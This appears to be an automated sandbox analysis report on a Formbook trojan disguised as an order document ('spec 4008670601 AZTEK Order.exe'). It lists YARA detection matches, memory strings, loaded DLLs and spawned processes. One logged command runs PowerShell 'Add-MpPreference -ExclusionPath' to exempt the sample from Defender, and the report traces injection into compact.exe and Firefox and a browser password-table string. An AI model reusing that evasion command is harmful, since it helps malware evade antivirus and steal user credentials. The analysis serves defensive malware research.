            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B027412_2_037B0274
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037902C012_2_037902C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0379815812_2_03798158
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037AA11812_2_037AA118
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0370010012_2_03700100
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C81CC12_2_037C81CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037D01AA12_2_037D01AA
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C41A212_2_037C41A2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037A200012_2_037A2000
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371077012_2_03710770
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0373475012_2_03734750
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0370C7C012_2_0370C7C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372C6E012_2_0372C6E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371053512_2_03710535
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037D059112_2_037D0591
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C244612_2_037C2446
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B442012_2_037B4420
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037BE4F612_2_037BE4F6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CAB4012_2_037CAB40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C6BD712_2_037C6BD7
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0370EA8012_2_0370EA80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372696212_2_03726962
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037129A012_2_037129A0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037DA9A612_2_037DA9A6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371A84012_2_0371A840
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371284012_2_03712840
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0373E8F012_2_0373E8F0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036F68B812_2_036F68B8
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03784F4012_2_03784F40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03730F3012_2_03730F30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B2F3012_2_037B2F30
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03752F2812_2_03752F28
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371CFE012_2_0371CFE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03702FC812_2_03702FC8
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0378EFA012_2_0378EFA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03710E5912_2_03710E59
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CEE2612_2_037CEE26
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CEEDB12_2_037CEEDB
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03722E9012_2_03722E90
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CCE9312_2_037CCE93
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037ACD1F12_2_037ACD1F
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371AD0012_2_0371AD00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0370ADE012_2_0370ADE0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03728DBF12_2_03728DBF
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03710C0012_2_03710C00
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03700CF212_2_03700CF2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B0CB512_2_037B0CB5
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036FD34C12_2_036FD34C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C132D12_2_037C132D
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0375739A12_2_0375739A
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B12ED12_2_037B12ED
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372B2C012_2_0372B2C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037152A012_2_037152A0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037DB16B12_2_037DB16B
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0374516C12_2_0374516C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036FF17212_2_036FF172
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371B1B012_2_0371B1B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C70E912_2_037C70E9
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CF0E012_2_037CF0E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037170C012_2_037170C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037BF0CC12_2_037BF0CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CF7B012_2_037CF7B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0375563012_2_03755630
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C16CC12_2_037C16CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C757112_2_037C7571
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037D95C312_2_037D95C3
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037AD5B012_2_037AD5B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0370146012_2_03701460
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CF43F12_2_037CF43F
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CFB7612_2_037CFB76
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03785BF012_2_03785BF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0374DBF912_2_0374DBF9
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372FB8012_2_0372FB80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03783A6C12_2_03783A6C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CFA4912_2_037CFA49
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C7A4612_2_037C7A46
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037BDAC612_2_037BDAC6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03755AA012_2_03755AA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037ADAAC12_2_037ADAAC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037B1AA312_2_037B1AA3
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0371995012_2_03719950
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372B95012_2_0372B950
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037A591012_2_037A5910
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0377D80012_2_0377D800
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037138E012_2_037138E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CFF0912_2_037CFF09
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036D3FD512_2_036D3FD5
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_036D3FD212_2_036D3FD2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CFFB112_2_037CFFB1
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03711F9212_2_03711F92
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03719EB012_2_03719EB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C7D7312_2_037C7D73
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037C1D5A12_2_037C1D5A
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03713D4012_2_03713D40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_0372FDC012_2_0372FDC0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03789C3212_2_03789C32
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_037CFCF212_2_037CFCF2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DD1C8012_2_02DD1C80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DEA71012_2_02DEA710
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCCE7012_2_02DCCE70
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCCE6712_2_02DCCE67
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCB2EB12_2_02DCB2EB
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCD09012_2_02DCD090
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DCB11012_2_02DCB110
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DD37C012_2_02DD37C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_02DD37BE12_2_02DD37BE
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2A27512_2_03A2A275
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2B01812_2_03A2B018
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2BAF412_2_03A2BAF4
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2BFAD12_2_03A2BFAD
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2BD7B12_2_03A2BD7B
            Source: C:\Windows\SysWOW64\compact.exeCode function: 12_2_03A2BC1512_2_03A2BC15
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 03757E54 appears 111 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 0377EA12 appears 86 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 0378F290 appears 105 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 036FB970 appears 280 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 03745130 appears 58 times
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: String function: 0179B970 appears 280 times
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: String function: 017E5130 appears 58 times
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: String function: 0182F290 appears 105 times
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: String function: 017F7E54 appears 103 times
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeCode function: String function: 0181EA12 appears 86 times
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2130973517.0000000006DE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2131268068.0000000006EB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2114773908.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2115615694.0000000002861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000000.2096605729.0000000000560000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQgGC.exe> vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2138549827.000000000D100000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001238000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMPACT.EXEj% vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2525813902.0000000001258000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMPACT.EXEj% vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exe, 00000006.00000002.2526178534.000000000189D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exeBinary or memory string: OriginalFilenameQgGC.exe> vs spec 4008670601 AZTEK Order.exe
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, R4SdoCfVfKm2ysGWeT.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, R4SdoCfVfKm2ysGWeT.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4561250.2.raw.unpack, LhKXYDnDrCC31IYC1l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, LhKXYDnDrCC31IYC1l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.d100000.7.raw.unpack, LhKXYDnDrCC31IYC1l.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.spec 4008670601 AZTEK Order.exe.4623470.3.raw.unpack, R4SdoCfVfKm2ysGWeT.csSecurity API names: _0020.AddAccessRule
            Source: spec 4008670601 AZTEK Order.exe, 00000000.00000002.2130973517.0000000006DE2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: A;.VBP
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/7@14/13
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\spec 4008670601 AZTEK Order.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvfivwcf.jud.ps1Jump to behavior
            Source: spec 4008670601 AZTEK Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: spec 4008670601 AZTEK Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: compact.exe, 0000000C.00000002.4556356627.0000000003188000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2707353193.0000000003188000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000002.4556356627.00000000031B7000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2707239965.0000000003168000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000C.00000003.2714067161.0000000003193000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: spec 4008670601 AZTEK Order.exeReversingLabs: Detection: 23%
            Source: unknownProcess created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
            Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"Jump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: appresolver.dllJump to behavior
